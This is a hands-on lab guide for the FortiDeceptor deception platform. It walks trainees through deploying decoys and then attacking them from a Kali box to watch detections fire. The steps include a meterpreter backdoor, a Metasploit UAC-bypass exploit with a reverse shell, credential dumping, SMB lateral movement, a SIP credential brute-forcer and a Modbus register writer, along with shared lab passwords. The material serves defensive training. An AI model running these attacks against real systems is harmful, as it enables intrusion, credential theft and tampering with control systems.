FortiDeceptor 4.3.0 - Threat Prevention and Detection with FortiDeceptor
FortiDeceptor 4.3.0 Hands on Labs v3
Introduction
FortiDeceptor allows organizations to rapidly create a fabricated deception network that lures attackers into revealing
themselves. FortiDeceptor serves as an early warning system by providing accurate detection that correlates an attacker's
activity details and lateral movement, indicating that a breach has happened. Threat intelligence gathered from the attacker
can be applied automatically to inline security controls to stop attacks before any real damage is done.
Participants who attend this workshop will learn how to:
• Deploy deception hosts to uncover attacker activity
• Use the anti-reconnaissance and anti-exploit engine to correlate events into incidents and campaigns, giving SecOps the information they need to act on
• Take action on discovered threat actor activity by integrating with the Fortinet Security Fabric to quarantine compromised hosts before they can do further damage
The training agenda covers the following items:
1. FortiDeceptor initial configuration and deploying decoy VMs
2. Attack the network and detect lateral movement
3. Increasing the deception surface by deploying deception lures
4. Integration with the Security Fabric for mitigation automation
• Link: https://<instance-name>.fortidemo.fortinet.com:10443
• Username: fortideceptor
• Password: FortiDeceptor12#
After successful authentication, you can view the portal that will allow you to access the FortiDeceptor lab components.
The SSL-VPN portal supports SSO, so all the lab devices should log you in automatically. If you are prompted for credentials, use your VPN credentials.
The VPN user account supports two VPN end-users at the same time.
1.3 Accessing the FortiDeceptor training environment
• FortiClient
We highly recommend you access the lab over FortiClient. If you do not have FortiClient, you can download a free trial here:
https://www.fortinet.com/support/product-downloads#vpn
Install the client and add a new connection with the following parameters:
VPN: SSL-VPN
Connection Name: FDC
Remote Gateway: <instance-name>.fortidemo.fortinet.com
Customize Port: 10443
Client Certificate: None
Username: fortideceptor
Password: FortiDeceptor12#
The VPN user account supports two VPN end-users at the same time. You can access the VPN from your laptop/PC directly to the FortiDeceptor.
• Lab IPs
FortiDeceptor offers a highly scalable 3-tier architecture that combines three levels of deception:
• Server/Endpoint Lures
• Medium Interaction Decoys (IoT/OT)
• High Interaction Decoys
Deception Lures can be deployed using existing infrastructure tools such as AD GPO, MS SCCM, etc.
A single FortiDeceptor appliance can run 20 Deception VMs that support 480 IP addresses in total. Each IP address represents a single Decoy.
Deception VMs can be downloaded from the FortiDeceptor marketplace; the appliance also allows the administrator to bring their own gold image and convert it to a Decoy using the FortiDeceptor Decoy Customization wizard.
Lab agenda (lab, description, duration):
4. Network Reconnaissance Attacks (15 minutes)
   Act as a bad entity and discover elements of interest on the network segment and use FortiDeceptor to analyze the incidents.
   Lateral Movement Detection: Expanding the Deception Surface (10 minutes)
   Learn how to expand the deception surface with Lure Deployment packages (tokens).
   Lateral Movement Detection: HoneyDocs Lure (10 minutes)
   Configure and test the deployment of HoneyDocs tokens and analyze incidents reported in FortiDeceptor.
   Decoy Engagement: Post Exploitation (10 minutes)
   Analyze decoy capture and records of the attacker's activities.
5. SQL Deception, 6. Tomcat Deception, 7. SIP Decoy (15 minutes)
   Configure, test and analyze the interaction with the SQL, Tomcat and/or SIP Decoy.
11. Outbreak Alerts for Recent Vulnerabilities (10 minutes)
   Configure, test and analyze the interaction with the Spring4Shell outbreak Decoy.
12. Fabric Integration (10 minutes)
   Configure, test and analyze the remediation using the FortiGate integration.
13. Decoy Deployment
   Configure how to deploy the Decoys required to complete the labs.
14. Cleanup (5 minutes)
   At the end of the labs, please follow the steps as outlined in this section of the document.
Labs
3 FortiDeceptor Initial Configuration
Before we start: PREPARATION (read this carefully)
Access the FortiDeceptor web management console via SSL-VPN (https://192.168.1.100). Ignore the fabric login option. If you see static data regarding incidents, events and/or lure distribution, reset the configuration first: log in to the CLI using the same credentials as for the UI login and perform a data purge:
data-purge -a
After entering the command, type 'y'. The FortiDeceptor unit will clean all data and reboot; this will take some time.
3. FortiDeceptor Management Console: Administrator Tasks
• Exercise: FortiDeceptor management console and configuration
In this exercise, we will familiarize ourselves with the FortiDeceptor management console and apply the initial configuration.
A Deployment Network is a network segment where the Decoy will be deployed. It can be configured as either a VLAN
or a subnet. The deployment network must be configured before the Decoy VM can be deployed.
5. Now we are going to create the deployment network for the Decoy deployment (192.168.2.0/24).
• Click on +Add New Vlan/Subnet.
• Configure the following settings:
Name: deploynet1
Interface: port2
VLAN ID: 0
Deploy Monitor IP/Mask: 192.168.2.100/24
Gateway: 192.168.2.1
ARP Protection: Unchecked (this option enables ARP spoofing/poisoning detection)
Tag: any
6. In v4.3 there is an option to test the deployment network (port2 in this case) to ensure that it is fit for decoy deployment. At the moment this can only be done via the CLI:
a. Log on to the FortiDeceptor CLI, either via the CLI icon on the top left of the GUI or by connecting directly over SSH.
b. Run test-deployment-network -iport2 -m00:00:00:00:00:00
c. You should see a message informing you that the network on port2 is good for decoy deployment.
We are now going to switch roles and become the attacker. We are going to do some active reconnaissance and scan for open ports to find interesting services, then try to use those services to infiltrate the network.
Nmap options:
• -F: fast mode, scan only the 100 most common ports instead of the default 1000.
• -sV: probe open ports to determine service/version information. The version information can be used to look up known vulnerabilities for the service.
• -Pn: skip host discovery (the ICMP/ping probes) and treat every target as online, which is useful when hosts do not answer ping.
You should see an incident with the Attacker IP (192.168.2.201), the Victim IP (192.168.2.x), and the Victim Port(s).
FortiDeceptor has the concept of Events, Incidents, and Campaigns. An Event is a single observation, for example a port being opened or closed. Incidents are made up of connected Events, and Campaigns are made up of connected Incidents. Here we can see the four events caused by the Nmap scan that make up the Incident: the port is opened, a connection is established, a command is executed, and the port is closed.
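To make the Event, Incident and Campaign hierarchy concrete, here is an added example in Python. It is not FortiDeceptor code: the log format, the time windows and the sample event lines are constructed for illustration. It groups raw decoy events on the same attacker/victim/port into incidents and chains one attacker's incidents across decoys into a campaign, which is the view that exposes a move from the Windows decoy to the SQL decoy as one operation rather than two unrelated alerts.

```python
"""Event -> Incident -> Campaign correlation over decoy events.

Added example, not FortiDeceptor code. The log format, the gap thresholds
and SAMPLE_LOG are constructed for illustration.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass
class Event:
    ts: datetime
    attacker: str
    victim: str
    port: int
    action: str  # port_open, connect, command, port_close


@dataclass
class Incident:
    """Connected events between one attacker and one victim port."""
    attacker: str
    victim: str
    port: int
    events: list = field(default_factory=list)

    @property
    def end(self):
        return self.events[-1].ts


@dataclass
class Campaign:
    """Connected incidents from one attacker, possibly across several decoys."""
    attacker: str
    incidents: list = field(default_factory=list)

    @property
    def victims(self):
        return sorted({i.victim for i in self.incidents})


def parse_events(lines):
    """Parse 'ts attacker victim port action' lines; skip blanks and comments."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, attacker, victim, port, action = line.split()
        events.append(Event(datetime.fromisoformat(ts), attacker, victim, int(port), action))
    return sorted(events, key=lambda e: e.ts)  # stable sort keeps same-second order


def build_incidents(events, gap=timedelta(minutes=5)):
    """Events on the same (attacker, victim, port) join the open incident for that
    key while they arrive within `gap` of its last event; otherwise a new one starts."""
    incidents, open_by_key = [], {}
    for ev in events:
        key = (ev.attacker, ev.victim, ev.port)
        cur = open_by_key.get(key)
        if cur is None or ev.ts - cur.end > gap:
            cur = Incident(ev.attacker, ev.victim, ev.port)
            incidents.append(cur)
            open_by_key[key] = cur
        cur.events.append(ev)
    return incidents


def build_campaigns(incidents, gap=timedelta(hours=1)):
    """Incidents from the same attacker chain into one campaign while each starts
    within `gap` of the previous incident's end, whatever the victim."""
    campaigns, open_by_attacker = [], {}
    for inc in sorted(incidents, key=lambda i: i.events[0].ts):
        cur = open_by_attacker.get(inc.attacker)
        if cur is None or inc.events[0].ts - cur.incidents[-1].end > gap:
            cur = Campaign(inc.attacker)
            campaigns.append(cur)
            open_by_attacker[inc.attacker] = cur
        cur.incidents.append(inc)
    return campaigns


# Constructed sample (not real decoy output): an Nmap-style touch of two decoy
# ports, a later move to the SQL decoy, and an unrelated probe the next day.
SAMPLE_LOG = """
# ts attacker victim port action
2024-01-01T10:00:00 192.168.2.201 192.168.2.11  445 port_open
2024-01-01T10:00:00 192.168.2.201 192.168.2.11  445 connect
2024-01-01T10:00:01 192.168.2.201 192.168.2.11  445 command
2024-01-01T10:00:01 192.168.2.201 192.168.2.11  445 port_close
2024-01-01T10:00:02 192.168.2.201 192.168.2.11 3389 port_open
2024-01-01T10:00:02 192.168.2.201 192.168.2.11 3389 connect
2024-01-01T10:00:03 192.168.2.201 192.168.2.11 3389 port_close
2024-01-01T10:20:00 192.168.2.201 192.168.2.16 3306 port_open
2024-01-01T10:20:01 192.168.2.201 192.168.2.16 3306 connect
2024-01-01T10:20:05 192.168.2.201 192.168.2.16 3306 command
2024-01-01T10:20:06 192.168.2.201 192.168.2.16 3306 port_close
2024-01-02T09:00:00 192.168.2.201 192.168.2.11  445 port_open
2024-01-02T09:00:00 192.168.2.201 192.168.2.11  445 port_close
"""


def correlate(text=SAMPLE_LOG):
    events = parse_events(text.splitlines())
    incidents = build_incidents(events)
    return events, incidents, build_campaigns(incidents)


if __name__ == "__main__":
    _, _, campaigns = correlate()
    for c in campaigns:
        print(f"campaign by {c.attacker}: {len(c.incidents)} incidents, victims {c.victims}")
        for i in c.incidents:
            print(f"  {i.victim}:{i.port} {[e.action for e in i.events]}")
```

Run stand-alone it prints two campaigns: the first chains the 445 and 3389 incidents on 192.168.2.11 with the later 3306 incident on 192.168.2.16 (the lateral move), the second holds only the next-day probe, which is outside the one-hour window. The windows are the tunable part; a real product picks them per protocol and per event type.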
4.1 Network Reconnaissance Attacks (before the lateral movement)
An attacker who detects the RDP port (3389) will try to obtain a username and password by running a brute force attack, or run an exploit against the service to get a remote shell.
FortiDeceptor will detect this attack, and all the attack alerts will be listed under the incident analysis section (Incident > Analysis).
Note: Toggle the Show dropdown box to view different events.
2. Use the following settings to create the Token package and press Save.
3. Go to the Windows desktop at the IP address 192.168.2.200 using the RDP client with your credentials or through the SSL-VPN web portal.
4. From the Windows desktop, access FortiDeceptor via Chrome (bookmark for 192.168.1.100) using the known credentials.
a. Go to the Deception Token menu.
b. Download the Deception Lure for the Windows 10 decoy to the Windows desktop.
5. Unzip the file on the Windows desktop.
6. Open the Windows directory and run the file windows_token.exe to deploy the deception lures.
7. After installation of the tokens, verify under FortiDeceptor > Deception > Deception Token > Token Deployment Status that the workstation has successfully laid the "breadcrumbs". As we use "online" tokens, you can change the tokens at any time and FDC will push the changes to the workstation.
Go back to the Windows desktop and run the file office.exe in the My Documents directory.
You should now have a backdoor session (meterpreter) from the Windows desktop machine to the KALI box. This allows you to load the attacker framework and get full access to the Windows OS and extract information such as saved passwords, network details, and more.
The Deception Lure expands the deception surface and presents fake information and credentials to the threat actor, so that malicious activity engages with a fake asset instead of a real one.
meterpreter > show_mount
This command presents the infected endpoint's local drive and the attached network drive. The attacker enters the drives to find sensitive files and learn about the endpoint owner (financial, HR, R&D, role, etc.). If the attacker enters the fake network drive, it leads to a decoy engagement that generates an alert.
meterpreter > getsystem
You will notice that you are missing the privileges to get system information. You also do not have enough permissions to read the credential manager to extract usernames and passwords. We need to take additional steps...
2. Let's continue the attack; we need to gain administrative privileges by running an escalation exploit.
meterpreter > ps -A x64
Shows x64 processes; select one of the svchost processes and note its PID.
meterpreter > migrate <PID>
Migrates the session into the selected x64 process.
meterpreter > background
Moves the backdoor session to the background so that more commands can be run from the Metasploit console.
4.2 Lateral movement Detection: Expanding the attack surface
3. To continue the attack, we need to gain administrative privileges by running a privilege escalation exploit.
msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac_sdclt
msf6 exploit(windows/local/bypassuac_sdclt) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_sdclt) > set SESSION 1
msf6 exploit(windows/local/bypassuac_sdclt) > set LHOST 192.168.2.201
msf6 exploit(windows/local/bypassuac_sdclt) > set LPORT 4443
msf6 exploit(windows/local/bypassuac_sdclt) > exploit
After the exploit completes you will end up in the meterpreter console again.
Now that the threat actor has dumped the infected endpoint's passwords from the Windows Credential Manager, the stolen credentials will be used for lateral movement.
In this example we got:
Username: Windows10\matthew > SMBUser
Domain: 192.168.2.11 > RHOST
Password: iloveyou > SMBPass
In your case the login will be different, as the decoy credentials are randomly generated.
5. Stop the Metasploit tool and use the SMB client on the KALI box to access 192.168.2.11 via SMB using the extracted credentials.
• Exit Metasploit:
msf6 exploit(windows/local/bypassuac_sdclt) > exit -y
Once connected to the share, it is easy to manipulate the files using the available options, for example downloading a file:
smb: \> get Leave_Notice_PTO.docx
In this case the credentials provide access to the Windows endpoint and present the existing network shares that the credentials can access. Even at this early stage of the attack, FortiDeceptor generates a security alert on the network drive access.
Note
In the current 4.3 release we identified a software anomaly with Windows SMB lures that prevents Incident Analysis logs from being displayed. This will be resolved in the coming release.
Mode: Online
3. Go to the Windows desktop at the IP address 192.168.2.200 using the RDP client with your credentials or through the SSL-VPN web portal.
4. From the Windows desktop, access FortiDeceptor via Chrome (bookmark for 192.168.1.100) using the known credentials.
a. Go to the Deception Token menu.
b. Download the Deception Package (token) for the HoneyDocs Lure to the Windows desktop.
4.3 Lateral Movement Detection: HoneyDocs Lure
7. Once the lure is successfully deployed, you should notice that fake content was created under the Downloads directory. Make sure the option to view hidden files is checked.
9. Browse to the Downloads folder and open any of the PDFs. Allow the pop-up asking to allow the connection.
Note - This is the End of Windows and Linux Decoy use cases, please delete the Win10 and Linux-Decoy decoy.
You should notice that the service is active on the default port 3306, as in the example below.
By now you should notice that an incident was triggered. Browse to Incident > Analysis and you should see multiple Reconnaissance Events from the Kali Linux machine to the SQL-Decoy.
You may also generate some Interactive Events by connecting to the database hosted on the SQL-Decoy. Use any of the generated lure users to connect to the database, like below:
fortideceptor@kali:~$ mysql -u <username> -p -h 192.168.2.16 CustomerDB
Once the connection is successful, issue multiple database commands (e.g. 'show tables;' or 'show databases;').
5. Probing the SQL Decoy
Browsing back to the FortiDeceptor dashboard > Incident > Interaction, you should notice the connection to the MySQL database and also the queries executed by the attacker.
Note - This is the End of SQL-Decoy use case, please delete the SQL decoy.
Note - This is the End of Tomcat-Decoy use case, please delete the Tomcat-decoy.
Network Discovery
Discover the network using nmap. From the Kali Linux CLI:
fortideceptor@kali:~$ nmap 192.168.2.0/24
The result should list the SIP decoy as a SIP server in the network.
Edit the users.txt file using the 'nano' tool and add the two lure credentials that you noted earlier. We took the first two in this example.
When you edit the file, make sure that you do not leave whitespace or empty lines in the text file.
Run a brute force attack using the SIP client script, which will use the user:password pairs to try to register to the SIP server. Issue the command line:
python3 sip_clientv1.py 192.168.2.18 5060 users.txt
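What a script like sip_clientv1.py does underneath is a SIP REGISTER exchange with digest authentication. The following is an added Python example and not the lab's script: it parses a users.txt of user:password lines (dropping the blank lines and stray whitespace the note above warns about), sends an unauthenticated REGISTER, answers the 401 challenge with an RFC 2617 MD5 digest, and reports the final status per credential. The users.txt format, the decoy address in the usage line and the 401 response used as sample input are assumptions.

```python
"""SIP REGISTER credential test with digest authentication.

Added example, not the lab's sip_clientv1.py. The users.txt format
(user:password per line), the decoy address and SAMPLE_401 are assumptions.
"""
import hashlib
import re
import socket
import sys
import uuid


def load_credentials(text):
    """Parse user:password lines, dropping blank lines, stray whitespace and junk."""
    creds = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or ":" not in line:
            continue
        user, _, password = line.partition(":")
        creds.append((user.strip(), password.strip()))
    return creds


def digest_response(user, realm, password, nonce, uri, method="REGISTER"):
    """RFC 2617 digest without qop, the form a plain SIP 401 challenge asks for."""
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()


def build_register(user, host, local_ip, auth=None, cseq=1):
    """Minimal REGISTER; `auth` is the Authorization parameter dict for the retry."""
    headers = [
        f"REGISTER sip:{host} SIP/2.0",
        f"Via: SIP/2.0/UDP {local_ip}:5060;branch=z9hG4bK{uuid.uuid4().hex[:16]}",
        f"From: <sip:{user}@{host}>;tag={uuid.uuid4().hex[:8]}",
        f"To: <sip:{user}@{host}>",
        f"Call-ID: {uuid.uuid4().hex}@{local_ip}",
        f"CSeq: {cseq} REGISTER",
        f"Contact: <sip:{user}@{local_ip}:5060>",
        "Max-Forwards: 70",
        "Expires: 60",
    ]
    if auth:
        headers.append("Authorization: Digest " + ", ".join(f'{k}="{v}"' for k, v in auth.items()))
    headers.append("Content-Length: 0")
    return ("\r\n".join(headers) + "\r\n\r\n").encode()


def parse_response(data):
    """Return (status code, digest challenge parameters) from a SIP response."""
    text = data.decode(errors="replace")
    status = int(text.split(" ", 2)[1])
    challenge = {}
    m = re.search(r"^WWW-Authenticate:\s*Digest\s*(.*)$", text, re.I | re.M)
    if m:
        challenge = dict(re.findall(r'(\w+)="?([^",]+)"?', m.group(1).strip()))
    return status, challenge


def try_register(host, port, user, password, local_ip="0.0.0.0", timeout=2.0):
    """Unauthenticated REGISTER, then answer the 401 challenge; returns the final status."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_register(user, host, local_ip), (host, port))
        status, chal = parse_response(s.recv(4096))
        if status != 401 or "nonce" not in chal:
            return status  # 200 means the decoy accepts anyone; anything else, no challenge
        uri = f"sip:{host}"
        realm = chal.get("realm", "")
        auth = {"username": user, "realm": realm, "nonce": chal["nonce"], "uri": uri,
                "response": digest_response(user, realm, password, chal["nonce"], uri)}
        s.sendto(build_register(user, host, local_ip, auth, cseq=2), (host, port))
        return parse_response(s.recv(4096))[0]


# Constructed 401 as a SIP decoy might return it (not a real capture).
SAMPLE_401 = (b"SIP/2.0 401 Unauthorized\r\n"
              b"Via: SIP/2.0/UDP 192.168.2.201:5060;branch=z9hG4bKdeadbeef\r\n"
              b'WWW-Authenticate: Digest realm="asterisk", nonce="1a2b3c4d", algorithm=MD5\r\n'
              b"Content-Length: 0\r\n\r\n")


if __name__ == "__main__":  # usage: python3 sip_register_test.py 192.168.2.18 5060 users.txt
    host, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    with open(path) as fh:
        for user, password in load_credentials(fh.read()):
            try:
                print(user, try_register(host, port, user, password))
            except socket.timeout:
                print(user, "timeout")
```

Every REGISTER, including the unauthenticated first one, is already enough for the decoy to raise an event, so the incident shows up on the first line of users.txt regardless of whether a 200 follows the 401.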
FortiDeceptor allows you to deploy OT assets using the SCADA3 Decoy. We will use KALI to test the SCADA Decoy.
Please ignore any error messages in the output; the main idea of these commands is enumeration and verifying the host status.
Modbus values can easily be changed when access is open. For example:
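As an added example of the kind of write the sentence above refers to (not taken from the lab guide or from the decoy), the Python below builds Modbus/TCP Read Holding Registers (FC 03) and Write Single Register (FC 06) frames, sends them to a decoy and decodes the replies, including the exception reply a device returns when a write is refused. The target address, unit id, register addresses and the sample reply bytes are constructed assumptions.

```python
"""Modbus/TCP read and write frames for exercising a SCADA decoy.

Added example, not from the lab guide or FortiDeceptor. The unit id, register
addresses and the SAMPLE_* reply bytes are constructed assumptions.
"""
import socket
import struct

MODBUS_PORT = 502


def mbap(transaction_id, unit_id, pdu):
    """MBAP header: transaction id, protocol id 0, length = unit id + PDU, unit id."""
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def read_holding_registers(tid, unit, address, count):
    """FC 03: read `count` 16-bit holding registers starting at `address`."""
    return mbap(tid, unit, struct.pack(">BHH", 0x03, address, count))


def write_single_register(tid, unit, address, value):
    """FC 06: write one 16-bit value; the device echoes address and value on success."""
    return mbap(tid, unit, struct.pack(">BHH", 0x06, address, value))


def parse_reply(frame):
    """Return (tid, unit, function, payload); raise on a Modbus exception reply."""
    tid, _proto, length, unit = struct.unpack(">HHHB", frame[:7])
    pdu = frame[7:7 + length - 1]
    func = pdu[0]
    if func & 0x80:  # exception: function code with the high bit set, then exception code
        raise ValueError(f"Modbus exception {pdu[1]} for function {func & 0x7F}")
    if func == 0x03:
        byte_count = pdu[1]
        regs = struct.unpack(f">{byte_count // 2}H", pdu[2:2 + byte_count])
        return tid, unit, func, list(regs)
    if func == 0x06:
        address, value = struct.unpack(">HH", pdu[1:5])
        return tid, unit, func, (address, value)
    return tid, unit, func, pdu[1:]


def exchange(host, frame, port=MODBUS_PORT, timeout=3.0):
    """Send one request frame over TCP and return the raw reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(frame)
        return s.recv(260)


# Constructed replies as a decoy might send them (not real captures).
SAMPLE_READ_REPLY = bytes.fromhex("0001 0000 0007 01 03 04 000a 0014")   # regs 0,1 = 10, 20
SAMPLE_WRITE_REPLY = bytes.fromhex("0002 0000 0006 01 06 0000 0063")     # echo: reg 0 = 99
SAMPLE_EXCEPTION = bytes.fromhex("0003 0000 0003 01 86 02")              # FC 06 refused, code 02


if __name__ == "__main__":  # usage: python3 modbus_decoy.py <SCADA decoy IP>
    import sys
    target = sys.argv[1]
    print("registers:", parse_reply(exchange(target, read_holding_registers(1, 1, 0, 2)))[3])
    print("write echo:", parse_reply(exchange(target, write_single_register(2, 1, 0, 99)))[3])
```

The write is the step that matters for the lab: a read alone looks like enumeration, while a successful FC 06 write against a decoy that exposes Modbus without authentication is the interaction that should show up as a high-severity incident and map onto the ICS tactics in the MITRE ICS tab.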
This is the End of Siemens-S7-200 decoy use case, please delete the Siemens-S7-200 decoy.
Please ignore the returned message and verify the incidents on FortiDeceptor.
This is the End of Siemens-S7-300 decoy use case, please delete the Siemens-S7-300 decoy.
10. Network Attacks: IoT Decoys
• Deploy the IoT Decoys and make sure they are up and running as described in sections 13.4 (HP Printer IoT Decoy Deployment) and 13.5 (Cisco Router 2691 IoT Decoy Deployment).
• After successful deployment, the Decoy Status should look like the following:
FortiDeceptor allows you to deploy IoT assets using IoT Decoys such as a Cisco router, HP printer and IP camera. You can access the Cisco decoy using the Telnet/web interface and try to read/write the configuration. We will use KALI to test the IoT Decoys.
Enumeration testing using Nmap (must be run as root with sudo):
@kali:~$ sudo nmap -sS -Pn -T5 -vv <CiscoIOS decoy IP / HP Decoy IP>
@kali:~$ sudo nmap -sU -p 161 --script snmp-sysdescr <CiscoIOS decoy IP / HP Decoy IP>
5. If you move to the Incident > MITRE ICS tab, you’d see the exact mappings of the attack
This is the End of IoT decoys use case, please delete HP-Printer and CiscoIOS decoys.
2. Use Python to start the script, targeting the outbreak decoy on FortiDeceptor:
@kali (/Downloads/spring4shell-scan)$ python3 spring4shell-scan.py -u https://192.168.2.17
3. Check the Incident > Analysis on FortiDeceptor that the scan was identified and correctly reported.
Name: fgtblocker
Block Severity: Check all (Low, Medium, High, Critical)
Integrate Method: FGT-REST-API
IP: 192.168.0.2
Port: 443
Username: fortideceptor
Password: FortiDeceptor12#
12. Fabric Integration
3. Press Save and verify that the Enabled and Ready status shows a positive connection to the FGT.
4. To trigger a mitigation action, we need to simulate an attack against one of the Decoys. Access the KALI BOX over SSH and check that you can reach the internet by pinging the Google DNS server:
@kali:~$ ping 8.8.8.8
5. Now use Nmap to run a port scan to trigger the quarantine action for the KALI BOX:
@kali:~$ sudo nmap -F -sV 192.168.2.17
7. This status is synced via the Fabric upstream to the FortiGate, which will now block the internet connection for that host. Verify this by pinging the Google DNS server again; it should no longer reply. Keep the ping running.
8. Go back to FortiDeceptor > Fabric > Quarantine Status, select the quarantined host and click the Unblock button to release the host from quarantine.
9. This status will be synced to the FortiGate and the running ping on the KALI BOX should start to reply again.
TCPlistener: Disable
NBNSSpoofSpotter: Disable
ICMP: Disable
FTP: Disable
The first DNS server (Google 8.8.8.8) and the hostname are pre-configured.
e. Click + Add Network for deployment to add the Decoy IP address, and configure the following settings:
Max: Keep as is
IP Ranges: Enter the IP address range from which FortiDeceptor can configure the Decoy IP addresses. For this example, configure as follows: 192.168.2.11
Decoy Interface Configuration example: Configuration for 1 Decoy IP Address
Note: Refresh the screen and wait for the status to change to Running. It can take around 5 minutes for the status to change
to Running. If the status changes to Fail, check your configuration and redeploy the Decoy. Once the status changes to
Running, the Action field is populated with additional icons.
Name: Linux-Decoy
HTTPS: Disable
GIT: Disable
ICMP: Enable
FTP: Disable
Reset Decoy: Disabled (In production, this feature resets the Decoy after attacker engagement, based on the specified time.)
The first DNS server (Google 8.8.8.8) and the hostname are pre-configured.
e. Click + Add Network for deployment to add the Decoy IP address, and configure the following settings:
Max: Keep as is
IP Ranges: Enter the IP address range from which FortiDeceptor can configure the Decoy IP addresses. For this example, configure as follows: 192.168.2.10-192.168.2.20
Decoy Interface Configuration example: Configuration for 11 Decoy IP Addresses (range)
Note: Refresh the screen and wait for the status to change to Running. It can take around 5 minutes for the status to change
to Running. If the status changes to Fail, check your configuration and redeploy the Decoy. Once the status changes to
Running, the Action field is populated with additional icons.
Note: This is an exclusive Fortinet router image, in real deployments, customers need to upload their own images.
• Generate lures
• Log in via the CLI, using the same credentials as for the UI login, and perform a data purge. After entering the command, type 'y'; the FortiDeceptor unit will clean all data and reboot.
data-purge -a
• Once the files are removed from the Downloads folder, delete the zip file.